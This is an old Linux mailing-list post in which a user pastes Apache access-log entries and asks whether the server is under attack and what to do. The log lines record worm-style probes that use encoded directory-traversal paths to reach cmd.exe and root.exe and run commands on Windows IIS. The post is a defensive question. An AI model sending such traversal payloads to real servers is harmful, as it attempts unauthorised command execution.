[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

under attack ?



Hi

my apache logs gives me tons of this crap:

212.29.230.44 - - [19/Sep/2001:20:38:12 +0300] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 285 "-" "-"
212.29.230.44 - - [19/Sep/2001:20:38:26 +0300] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 283 "-" "-"
212.29.230.44 - - [19/Sep/2001:20:38:31 +0300] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
212.29.230.44 - - [19/Sep/2001:20:38:34 +0300] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
212.29.230.44 - - [19/Sep/2001:20:38:38 +0300] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
212.29.230.44 - - [19/Sep/2001:20:38:44 +0300] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
212.29.230.44 - - [19/Sep/2001:20:39:05 +0300] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
212.29.230.44 - - [19/Sep/2001:20:39:08 +0300] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"
212.29.230.44 - - [19/Sep/2001:20:39:11 +0300] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
212.29.230.44 - - [19/Sep/2001:20:39:17 +0300] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"

Does it mean someone thinks I'm running NT and try to hack to my server ?
I also get alot of "GET default.ide...." and about this I'm almost sure that
it's related to NT servers, but I'm not sure about the rest. Questions:
1) Am I right ?
2) What can I do about it ?

Thanks,
Ishai.


=================================================================
To unsubscribe, send mail to linux-il-request@linux.org.il with
the word "unsubscribe" in the message body, e.g., run the command
echo unsubscribe | mail linux-il-request@linux.org.il